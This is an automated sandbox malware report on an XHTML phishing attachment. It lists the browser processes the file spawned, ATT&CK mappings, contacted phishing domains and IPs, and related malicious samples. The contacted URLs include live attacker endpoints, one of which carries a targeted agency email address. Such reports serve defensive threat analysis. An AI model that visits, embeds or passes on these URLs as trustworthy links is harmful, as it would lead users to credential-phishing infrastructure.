Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.24:60846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.24:60847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.24:60853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.24:60854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.24:60857 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.24:60862 version: TLS 1.2

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir1880_9883518

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir1880_9883518

Jump to behavior

Source: classification engine

Classification label: mal72.phis.winXHTML@22/23@25/10

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1904,i,14389278284596491628,1559967262016630819,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2192 /prefetch:11
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\ATT11027.xhtml"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1904,i,14389278284596491628,1559967262016630819,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250316-180048.776000 --mojo-platform-channel-handle=2192 /prefetch:11	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
file:///C:/Users/user/Desktop/ATT11027.xhtml	0%	Avira URL Cloud	safe
https://avcbtech.site/gtk/xwps.php	0%	Avira URL Cloud	safe
https://office.avcbtech.store/gtk/xls/g1t2k.js?uid=ombudsman@ombudsman.gov.au	0%	Avira URL Cloud	safe
https://sender.linxcoded.top/start/xls/includes/css6.css	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0012.t-0009.t-msedge.net	13.107.246.40	true	false	high
onedscolprdcus16.centralus.cloudapp.azure.com	52.182.143.213	true	false	high
office.avcbtech.store	139.28.36.38	true	false	high
code.jquery.com	151.101.66.137	true	false	high
avcbtech.site	104.168.138.190	true	false	high
server1.linxcoded.top	185.174.100.76	true	false	unknown
www.google.com	142.251.35.164	true	false	high
api.ipify.org	104.26.13.205	true	false	high
sender.linxcoded.top	185.174.100.20	true	false	high
ipv4.imgur.map.fastly.net	199.232.196.193	true	false	high
_8105._https.server1.linxcoded.top	unknown	unknown	false	unknown
browser.events.data.msn.cn	unknown	unknown	false	high
i.imgur.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://office.avcbtech.store/gtk/xls/g1t2k.js?uid=ombudsman@ombudsman.gov.au	false	Avira URL Cloud: safe	unknown
https://i.imgur.com/0HdPsKK.png	false		high
https://browser.events.data.msn.cn/OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=c498711f02654edca8a715ca6e1cb4d4-dc31da17-845c-4cca-84e5-547d05dad708-6945&upload-time=1742511165047&w=0&anoncknm=al_app_anon&NoResponseBody=true	false		high
file:///C:/Users/user/Desktop/ATT11027.xhtml	true	Avira URL Cloud: safe	unknown
https://sender.linxcoded.top/start/xls/includes/css6.css	false	Avira URL Cloud: safe	unknown
https://i.imgur.com/KAb5SEy.png	false		high
https://avcbtech.site/gtk/xwps.php	true	Avira URL Cloud: safe	unknown
https://code.jquery.com/jquery-3.1.1.min.js	false		high
https://api.ipify.org/?format=json	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_61.1.dr	false		high
https://getbootstrap.com)	chromecache_61.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	unknown	United States	13335	CLOUDFLARENETUS	false
185.174.100.20	sender.linxcoded.top	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
139.28.36.38	office.avcbtech.store	Ukraine	42331	FREEHOSTUA	false
199.232.196.193	ipv4.imgur.map.fastly.net	United States	54113	FASTLYUS	false
185.174.100.76	server1.linxcoded.top	Ukraine	8100	ASN-QUADRANET-GLOBALUS	false
104.168.138.190	avcbtech.site	United States	54290	HOSTWINDSUS	false
151.101.66.137	code.jquery.com	United States	54113	FASTLYUS	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
142.251.35.164	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.24

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1644784
Start date and time:	2025-03-20 23:51:55 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ATT11027.xhtml
Detection:	MAL
Classification:	mal72.phis.winXHTML@22/23@25/10
Cookbook Comments:	Found application associated with file extension: .xhtml

Warnings

Exclude process from analysis (whitelisted): SystemSettingsBroker.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 142.251.32.110, 142.251.40.227, 142.251.40.238, 142.251.16.84, 142.250.80.46, 142.250.65.238, 142.250.176.206, 142.251.40.106, 131.107.255.255, 199.232.214.172, 172.217.165.138, 142.251.40.234, 142.251.41.10, 142.251.40.202, 142.251.40.170, 142.251.40.138, 142.251.32.106, 142.250.64.106, 142.250.81.234, 142.250.72.106, 142.250.65.170, 142.250.64.74, 142.250.65.202, 142.251.35.170, 142.250.65.234, 142.250.80.78, 142.250.65.206, 142.250.65.195, 142.250.80.35, 142.251.40.206, 142.251.40.142, 13.107.246.40, 172.202.163.200
Excluded domains from analysis (whitelisted): accounts.google.com, slscr.update.microsoft.com, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, www.googleapis.com, firstparty-azurefd-prod.trafficmanager.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	ArenaWarsSetup.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	ue8Q3DCbNG.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	LauncherV9.exe	Get hash	malicious	LummaC Stealer	Browse	api.ipify.org/
	Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=xml
	NightFixed 1.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	VibeCall.exe	Get hash	malicious	RHADAMANTHYS	Browse	api.ipify.org/
	VRChat_ERP_Setup 1.0.0.msi	Get hash	malicious	Unknown	Browse	api.ipify.org/
	wEY98gM1Jj.ps1	Get hash	malicious	LummaC Stealer	Browse	api.ipify.org/
	oNvY66Z8jp.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Pmw24ExIdx.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
185.174.100.20	Play_VM-Now(bfrieden)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse
	https://keep.za.com/cgi//redirect.php#rbruening@elford.com	Get hash	malicious	HtmlDropper	Browse
	ATT-897850.htm	Get hash	malicious	HtmlDropper	Browse
	+11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg	Get hash	malicious	HtmlDropper	Browse
	Play-Audio_Vmail_Ach Statement Credi....html	Get hash	malicious	HtmlDropper	Browse
	Play_VM.Now.matt.sibilo_Audio.wav...v.html	Get hash	malicious	HtmlDropper	Browse
	original (37).eml	Get hash	malicious	Unknown	Browse
	022 0.10.htm	Get hash	malicious	HTMLPhisher	Browse
139.28.36.38	Play_VM-Now(bfrieden)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse
	ATT99718.htm	Get hash	malicious	Unknown	Browse
	https://eu-west-1.protection.sophos.com/?d=keysurgical.de&u=aHR0cHM6Ly93d3cua2V5c3VyZ2ljYWwuZGUvSG9tZS9TZWxlY3RMYW5ndWFnZT9sYW5ndWFnZT1lbi1VUyZyZWRpcmVjdFVybD1odHRwczovL2VuZXJncmVlbi5ycy8ud2VsbC1rbm93bi9hY21lLWNoYWxsZW5nZS8=&p=m&i=NjEwYjE2Y2U0Zjc0MWMwZTk2MmNlZjk5&t=OE0wZTk1N0Y5dDJ6N29CQlM3RlRxNW5DbXpKbTRqcWJzeTE0UnZUZXJyTT0=&h=ccb3dc1d93924e5398cb784943bcbc84&s=AVNPUEhUT0NFTkNSWVBUSVaHyS6hqym7qLqtAI_LAX_uaGik92MJH8on0iF38froOA	Get hash	malicious	HTMLPhisher	Browse
199.232.196.193	setup.exe	Get hash	malicious	Xmrig	Browse	i.imgur.com/FzGMM7P.jpg

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
onedscolprdcus16.centralus.cloudapp.azure.com	SecuriteInfo.com.Gen.Variant.Lazy.649482.12922.9719.msi	Get hash	malicious	Unknown	Browse	52.182.143.213
avcbtech.site	Play_VM-Now(bfrieden)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	104.168.138.190
avcbtech.site	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse	104.168.138.190
api.ipify.org	https://u2587569.ct.sendgrid.net/ls/click?upn=u001.tNCzvDY7Bps68NDHX050sfuZjwcZnKCiceJckL-2B-2BdtgW4S9czNQzTHuxGTDYUy2rgldwS-2FXaSK9tb15A2WijtesF9nKvyaekU8V6epmALsKFNzS6qhT8Y0hQxsOJhohPcwmraeJIKZH9TyOwWHJmFuZBAHXDHHKqUVL-2FUGP0fxMK3MBdQxp6bY6Ha8NZBWkjR7mgJ5fMAAuHlcLpVUtqCKWF7-2BW-2FrkTigMom4or-2B8m-2FS4TyrdjqGrNF-2BS24W1HEc4Nny-2FQbpl5Jr7z80HD8ERxHFxRHxDPLk-2B4YAHJEAIhKPImdnrMMiJGr9A4uEtPP39M5paIcI5sxlMhNL6z-2BKgTbMjlWBJaVVTxeufFQoFkl5u4NmsI44p17fSNIf2kHaYMMtnw0u0ApwVb9wZ3tJmp8AGgV65F1zRvnrFTPWISLatDmHGN3CKd73qRTLKmto5ZSsX3-2BwDUXMaUslNCFnOeOBvQkBDvUajrHfQmlQGD0zklpJ9WRzeYfjf4q-2Bc4Qu1Nf91VjDSdu48kXA2Z83MvwnSyKbPC863DiAR29AdxPmi1nIgYKk06DgcAWMuq2ENVqbbCQtUVgtZaYHCTljloaWego9b111Sg-2Be7K5sjWZvL10Fd-2Fe8x58DkwbvBNZsy8kmn2mGi8qVqTeWx9-2Brhlr4k1qrS1CvUmSqedu0NrwPQeaJupno6T-2Bqo-2BzulaLbvdWFreaPwNJ5CTaPVCN9fpvhUAzUS-2FlWTTCA-2FnSuCPTscXiBnW-2B4ungzp4n8Lqpuk6XGZd1rraYdTpcYsjIFBAluxLUtcFe1RkWRujzmOwPcDxwpZgxVj9TsDAzb4JrMPmBN2Sin7qgSZpDFxIb3yOVqUu9FExdB-2Fwpe-2FOokwr4-3D8A5E_-2FOI-2FxWKZBS0RBubCQDq4P71qBkOoJj9TQ-2FBNKjRykiT9mUix5aObCdsaE3X4Sh22h5PBW1VseZKNRSMsHcEXChaxx4fpyalr8S5mdNAGDIFE0BdGE6SFPQC1ze3qi3ZOs99VkecPMd3ju7N-2BWWYyJE6xPy-2FgXhUKDOj-2BkfDKJ8KqABvqtFGuxd5KhNBGU7VDh7BHPjKSbdGclNFQCojq4NR0NeZ6xwwI2wKPGRZHpHU-3D	Get hash	malicious	Unknown	Browse	104.26.12.205
	google.meet-join.us.ps1	Get hash	malicious	NetSupport RAT	Browse	104.26.13.205
	SHIP PARTICULARS TBN 1.docx.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	STAR ASPIRATION VLS'S DETAILS.xlsx.bat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	rCONFIDENTIAL_P.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Datasheet.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	https://www.creditopersonalcard1f.ru/validaciones/cardif/3	Get hash	malicious	Unknown	Browse	104.26.13.205
	Talksy (1).exe	Get hash	malicious	Meduza Stealer, RHADAMANTHYS	Browse	172.67.74.152
	Doc93847023000200009.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	CONFIDENTIAL_PAYMENT_CONFIRMATION_TRANSACTION_DETAILS_03224.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
code.jquery.com	vRecording__118sec__Highwoodoil00990__098.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.194.137
	https://er.avunzocl.ru/hhtc/	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.194.137
	Alsaywater__098.html	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	https://veriqwyrfizxhsmh.serveirc.com/kabQ8B9	Get hash	malicious	Unknown	Browse	151.101.130.137
	https://incomestatementdocument.classical.it.com/NC6tS/	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252FK9w.sddsvy.es%2525252FBxNQqiw%2525252F%25252F0WHq%25252F1RW8AQ%25252FAQ%25252F106cafa4-d18e-426c-9c6b-0f673158a485%25252F1%25252FQcQNxevtyr%252F0WHq%252F1hW8AQ%252FAQ%252Ff55af109-6f88-4167-9100-4e0e08b04dca%252F1%252F7xsS23xLL0%2F0WHq%2F1xW8AQ%2FAQ%2F226957d7-6fa4-4c2e-a225-8b6a515720c4%2F1%2F4AJYmbgWvp/0WHq/1xW8AQ/AQ/479046d5-0675-43ef-af75-bb8f5d046f39/1/59AZebyk9_#a2lkZC50YW1hcmFAYWlkYi5vcmc=	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.2.137
	Over due Inv.msg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.66.137
	https://b3rz.5m54lq.ru/A9y-e3M/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
	#U25baPlay_VM-Now(John.moorer)ATTT0003.html	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://bid-docs-groovy-site-b6a761.webflow.io/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	151.101.2.137
s-part-0012.t-0009.t-msedge.net	460138.pdf	Get hash	malicious	Unknown	Browse	13.107.246.40
	Product_Requirements.Doc (1).HTML.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	Alsaywater__098.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	https://incomestatementdocument.classical.it.com/NC6tS/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	http://url5681.planter.eco/ls/click?upn=u001.PX1-2BssefkOe686e7wTSUMqibxN-2FCUadbAKgpTv23cYOIQxMvH9FGLuwPON-2Ft4V08mI3EhMVAoZnU-2Br4hRroTgY6212B0nGnr8aV-2B5ZtDZ10DmDDkH6mdlmAzG8M-2BiNsGPGMX1iPzlrrdaY9R4kk4qHfVergkdfGzm-2BAmGL-2FwYqLpCth-2FU-2ByXRztop6mHKwMCk43gAzvI9DCKmBcEcJQKyQ-3D-3Da5U3_GwWzR5CPD3uhhoxi7nJtY0-2BQC5TKRtJEXtldUtgGNIU9EPMkwXhPBMhFexKYRqOhYUH1k-2FQVOT9D8S6mnbGzOTVeFZqZ2eiXdrD6GdHPzzO106h29UdS-2BIz4v5acd9FnatQanlGtMNJsbvRJRS5dF6-2BMeTnNy39wilhlMfgiqmmr792hlZiyIO30hIfNO7fmE4Qvw7CYEB9aPKMoYkpeVA-3D-3D	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	#U25baPlay_VM-Now(John.moorer)ATTT0003.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	t8f2gm11IC.pdf	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	https://kbgchambersco.artisticlandscapes.de/ZgBuZ/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
	Illinois Central College 2025-03-19.docx	Get hash	malicious	HTMLPhisher, ReCaptcha Phish	Browse	13.107.246.40
	https://rolyms.taplink.ws/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.40
office.avcbtech.store	Play_VM-Now(bfrieden)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT99718.htm	Get hash	malicious	Unknown	Browse	139.28.36.38

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	build.msi	Get hash	malicious	Unknown	Browse	104.21.64.101
	Product_Requirements.Doc (1).HTML.html	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	Client-built.exe	Get hash	malicious	Discord Rat	Browse	162.159.130.234
	https://sauravsadangi.com/project	Get hash	malicious	Unknown	Browse	104.19.230.21
	Client-built.exe	Get hash	malicious	Discord Rat	Browse	162.159.130.234
	_Invoke-PSHtml5.ps1	Get hash	malicious	Unknown	Browse	104.21.6.31
	teramind_agent_x64_s.msi	Get hash	malicious	Unknown	Browse	172.67.26.154
	vRecording__118sec__Highwoodoil00990__098.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	104.21.11.122
	http://bit.ly/e0Mw9w	Get hash	malicious	HTMLPhisher	Browse	104.21.6.31
	http://email.mg.versatilev.com/c/eJwczMFtxSAMANBp4BgZ28Rw4NBL9gDH9CPlt1GCoo5ftQO8txdtHLp4K0EYOWVI4l-l7mnFGljyHiCAUYtkGKW2Hlfp7EdBwAiEEFZmlkWppZyjMWmutIpjeH8uj113neOwZ9Hvtz_Ka87zdvThcHO4hZpISBmtZU3aCSzFnZc5jmZf-vOHHG7-Kuc11E7HcNeh_9dT8DcAAP__O8c2mA	Get hash	malicious	HTMLPhisher	Browse	104.16.124.96
ASN-QUADRANET-GLOBALUS	http://url5681.planter.eco/ls/click?upn=u001.PX1-2BssefkOe686e7wTSUMqibxN-2FCUadbAKgpTv23cYOIQxMvH9FGLuwPON-2Ft4V08mI3EhMVAoZnU-2Br4hRroTgY6212B0nGnr8aV-2B5ZtDZ10DmDDkH6mdlmAzG8M-2BiNsGPGMX1iPzlrrdaY9R4kk4qHfVergkdfGzm-2BAmGL-2FwYqLpCth-2FU-2ByXRztop6mHKwMCk43gAzvI9DCKmBcEcJQKyQ-3D-3Da5U3_GwWzR5CPD3uhhoxi7nJtY0-2BQC5TKRtJEXtldUtgGNIU9EPMkwXhPBMhFexKYRqOhYUH1k-2FQVOT9D8S6mnbGzOTVeFZqZ2eiXdrD6GdHPzzO106h29UdS-2BIz4v5acd9FnatQanlGtMNJsbvRJRS5dF6-2BMeTnNy39wilhlMfgiqmmr792hlZiyIO30hIfNO7fmE4Qvw7CYEB9aPKMoYkpeVA-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.245.240.188
	AVISO DE COBRO DHL - 1606604473.PDF.exe	Get hash	malicious	DarkCloud	Browse	204.44.192.90
	splx86.elf	Get hash	malicious	Unknown	Browse	64.189.38.253
	resgod.arm5.elf	Get hash	malicious	Mirai	Browse	104.247.172.118
	https://office.mx-senora.com/validate-captcha?user_id=4bP8rZrJvBAKS5wfleIW	Get hash	malicious	Unknown	Browse	45.61.166.78
	Factura - FAT120250320.pdf(94KB).com.exe	Get hash	malicious	DarkTortilla, XWorm	Browse	104.245.240.123
	huawei.elf	Get hash	malicious	Mirai	Browse	104.223.82.201
	Play_VM-Now(bfrieden)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	185.174.100.76
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	185.174.100.76
	mips.elf	Get hash	malicious	Unknown	Browse	104.245.241.64
FASTLYUS	Product_Requirements.Doc (1).HTML.html	Get hash	malicious	HTMLPhisher	Browse	151.101.193.229
	vRecording__118sec__Highwoodoil00990__098.svg	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	185.199.108.133
	https://techresearchs.benchurl.com/c/l?u=12450653&e=199143A&c=163607&&t=0&l=12689B51E&email=VHWZIWwomIKWc0sY%2B8V5agif8GG0Zxj9&seq=1	Get hash	malicious	Unknown	Browse	151.101.2.132
	https://er.avunzocl.ru/hhtc/	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.194.137
	Alsaywater__098.html	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	https://gamma.app/docs/Maui-Police-Department-a50fopf77jftjw5?mode=present#card-ye73d3tp4jd8wbi	Get hash	malicious	HTMLPhisher	Browse	151.101.2.217
	https://madisonoffice.carrd.co/	Get hash	malicious	HTMLPhisher	Browse	151.101.2.132
	https://veriqwyrfizxhsmh.serveirc.com/kabQ8B9	Get hash	malicious	Unknown	Browse	151.101.130.137
	https://incomestatementdocument.classical.it.com/NC6tS/	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252FK9w.sddsvy.es%2525252FBxNQqiw%2525252F%25252F0WHq%25252F1RW8AQ%25252FAQ%25252F106cafa4-d18e-426c-9c6b-0f673158a485%25252F1%25252FQcQNxevtyr%252F0WHq%252F1hW8AQ%252FAQ%252Ff55af109-6f88-4167-9100-4e0e08b04dca%252F1%252F7xsS23xLL0%2F0WHq%2F1xW8AQ%2FAQ%2F226957d7-6fa4-4c2e-a225-8b6a515720c4%2F1%2F4AJYmbgWvp/0WHq/1xW8AQ/AQ/479046d5-0675-43ef-af75-bb8f5d046f39/1/59AZebyk9_#a2lkZC50YW1hcmFAYWlkYi5vcmc=	Get hash	malicious	Invisible JS, Tycoon2FA	Browse	151.101.2.137
FREEHOSTUA	Play_VM-Now(bfrieden)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	Play_VM-Now(eric.basil)VWAV.xhtml	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT09858.htm	Get hash	malicious	HTMLPhisher	Browse	139.28.36.38
	ATT99718.htm	Get hash	malicious	Unknown	Browse	139.28.36.38
	armv5l.elf	Get hash	malicious	Unknown	Browse	193.42.104.40
	xd.mips.elf	Get hash	malicious	Mirai	Browse	193.42.104.85
	firmware.armv5l.elf	Get hash	malicious	Unknown	Browse	185.13.5.61
	http://micr.tech-arnericas.com	Get hash	malicious	Fake Captcha, HTMLPhisher	Browse	139.28.37.60
	https://rickhome.com/secuure	Get hash	malicious	Fake Captcha, Phisher	Browse	139.28.37.144
	jXBjxhHQgR.exe	Get hash	malicious	CMSBrute	Browse	176.107.176.31

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

Chrome Cache Entry: 52

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	dropped
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
